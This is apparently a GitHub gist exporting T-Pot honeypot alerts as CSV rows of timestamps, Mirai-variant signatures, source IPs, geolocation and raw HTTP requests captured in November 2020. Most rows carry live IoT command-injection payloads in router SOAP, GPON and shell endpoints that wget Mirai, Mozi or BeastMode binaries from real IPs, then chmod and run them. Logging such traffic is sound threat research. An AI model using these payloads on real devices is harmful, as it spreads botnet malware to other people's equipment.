Last active
November 20, 2020 12:02
-
-
Save teixeira0xfffff/cab85ede8e81671b8261e15e8708c5f4 to your computer and use it in GitHub Desktop.
Tpot experiment on Digital Ocean [https://github.com/telekom-security/tpotce]
We can make this file beautiful and searchable if this error is corrected: No tabs found in this TSV file in line 0.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"@timestamp","alert.signature","http.http_request_body_printable","src_ip","src_port","geoip.country_name","payload_printable","http.url","geoip.as_org","geoip.city_name","geoip.asn" | |
"Nov 8, 2020 @ 23:17:59.126","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;` | |
","94.200.76.222",49573,"United Arab Emirates","POST /cgi HTTP/1.1 | |
User-Agent: XTC | |
Host: 127.0.0.1:8089 | |
Content-Length: 172 | |
Accept-Encoding: application/json | |
action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;` | |
","/cgi","Emirates Integrated Telecommunications Company PJSC (EITC-DU)",Dubai,15802 | |
"Nov 8, 2020 @ 20:43:30.552","ET SCAN Mirai Variant User-Agent (Inbound)",,"124.167.93.57",35619,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",,4837 | |
"Nov 8, 2020 @ 20:08:43.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://187.68.120.209:33999/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","187.68.120.209",53991,Brazil,,"/soap.cgi?service=WANIPConn1","Claro S/A","Rio de Janeiro",22085 | |
"Nov 8, 2020 @ 19:39:22.884","ET SCAN Mirai Variant User-Agent (Inbound)",,"110.52.175.144",26899,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",Changsha,4837 | |
"Nov 8, 2020 @ 15:38:17.719","ET SCAN Mirai Variant User-Agent (Inbound)",,"1.60.76.152",19605,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",,4837 | |
"Nov 8, 2020 @ 02:14:11.101","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.218.212.23",44764,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",Alexandria,8452 | |
"Nov 8, 2020 @ 02:08:17.006","ET SCAN Mirai Variant User-Agent (Inbound)",,"197.63.184.227",33732,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",,8452 | |
"Nov 8, 2020 @ 00:31:03.640","ET SCAN Mirai Variant User-Agent (Inbound)",,"183.157.168.255",44513,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws",Chinanet,Taizhou,4134 | |
"Nov 7, 2020 @ 19:14:45.463","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","cpe_ids=__import__('os').system('wget http://178.33.64.107/arm7 -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug') | |
","74.102.39.43",36567,"United States","GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1 | |
User-Agent: XTC | |
Host: 127.0.0.1:9673 | |
Content-Length: 1000 | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9 | |
cpe_ids=__import__('os').system('wget http://178.33.64.107/arm7 -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug') | |
","/live/CPEManager/AXCampaignManager/delete_cpes_by_ids","MCI Communications Services, Inc. d/b/a Verizon Business",Paterson,701 | |
"Nov 7, 2020 @ 18:41:56.707","ET SCAN Mirai Variant User-Agent (Inbound)",,"183.157.172.52",2092,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws",Chinanet,Taizhou,4134 | |
"Nov 7, 2020 @ 08:27:20.152","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","220.170.174.22",29280,China,,"/UD/act?1",Chinanet,Guangzhou,4134 | |
"Nov 7, 2020 @ 03:30:25.917","ET SCAN Mirai Variant User-Agent (Inbound)",,"37.211.186.233",56600,Qatar,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Ooredoo Q.S.C.",Doha,42298 | |
"Nov 6, 2020 @ 22:57:20.467","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://42.227.244.188:55717/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","42.227.244.188",34081,China,"POST /soap.cgi?service=WANIPConn1 HTTP/1.1 | |
Host: 165.232.58.232:49152 | |
Content-Length: 630 | |
Accept-Encoding: gzip, deflate | |
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping | |
Accept: */* | |
User-Agent: Hello, World | |
Connection: keep-alive | |
<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://42.227.244.188:55717/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","/soap.cgi?service=WANIPConn1","CNCGROUP China169 Backbone",Nanyang,4837 | |
"Nov 6, 2020 @ 14:22:15.814","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://42.234.233.228:43385/Mozi.m+-O+->/tmp/gpon80","42.234.233.228",34611,China,"POST /GponForm/diag_Form?images/ HTTP/1.1 | |
Host: 127.0.0.1:80 | |
Connection: keep-alive | |
Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: Hello, World | |
Content-Length: 118 | |
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://42.234.233.228:43385/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0","/GponForm/diag_Form?images/","CNCGROUP China169 Backbone",Chifeng,4837 | |
"Nov 6, 2020 @ 07:56:17.755","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.202.148.43",54685,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",,8452 | |
"Nov 6, 2020 @ 04:26:09.226","ET SCAN Mirai Variant User-Agent (Inbound)",,"42.59.174.156",40543,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",,4837 | |
"Nov 6, 2020 @ 02:06:37.728","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.209.208.252",47566,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",Giza,8452 | |
"Nov 5, 2020 @ 21:53:49.807","ET SCAN Mirai Variant User-Agent (Inbound)",,"218.59.53.181",37315,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",Qingdao,4837 | |
"Nov 5, 2020 @ 18:09:50.858","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://72.90.235.219:37495/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","72.90.235.219",51084,"United States","POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:7574 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://72.90.235.219:37495/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","MCI Communications Services, Inc. d/b/a Verizon Business",Irvington,701 | |
"Nov 5, 2020 @ 11:11:22.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://125.43.210.46:53267/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","125.43.210.46",54992,China,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:5555 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://125.43.210.46:53267/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","CNCGROUP China169 Backbone",,4837 | |
"Nov 5, 2020 @ 10:08:00.678","ET SCAN Mirai Variant User-Agent (Inbound)",,"14.164.78.61",60382,Vietnam,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","VNPT Corp",,45899 | |
"Nov 5, 2020 @ 06:51:34.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","101.0.38.3",44034,India,,"/soap.cgi?service=WANIPConn1","Broadband Pacenet Pvt. Ltd",Mathura,23682 | |
"Nov 5, 2020 @ 01:12:56.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://59.93.17.56:60484/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","59.93.17.56",50155,India,,"/soap.cgi?service=WANIPConn1","National Internet Backbone",Chennai,9829 | |
"Nov 4, 2020 @ 15:16:39.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://58.242.196.133:51452/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","58.242.196.133",44569,China,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:5555 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://58.242.196.133:51452/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","CNCGROUP China169 Backbone",,4837 | |
"Nov 4, 2020 @ 02:23:50.194","ET SCAN Mirai Variant User-Agent (Inbound)",,"62.98.145.79",45939,Italy,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Wind Telecomunicazioni SpA",Nola,1267 | |
"Nov 4, 2020 @ 01:38:28.943","ET SCAN Mirai Variant User-Agent (Inbound)",,"187.163.39.133",47879,Mexico,"GET /shell?cd+/tmp;rm+-rf+*;wget+206.126.81.105/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+206.126.81.105/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Axtel, S.A.B. de C.V.","San Luis Potosí City",6503 | |
"Nov 3, 2020 @ 19:44:26.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://117.241.65.38:44046/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","117.241.65.38",57290,India,,"/soap.cgi?service=WANIPConn1","National Internet Backbone",Chennai,9829 | |
"Nov 3, 2020 @ 18:53:34.450","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","91.234.62.22",61655,Russia,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:7574 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","INKO-Telecom, LLC",Lukhovitsy,198367 | |
"Nov 3, 2020 @ 14:58:04.133","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://31.163.149.159:47455/Mozi.m+-O+->/tmp/gpon80","31.163.149.34",38426,Russia,"POST /GponForm/diag_Form?images/ HTTP/1.1 | |
Host: 127.0.0.1:8080 | |
Connection: keep-alive | |
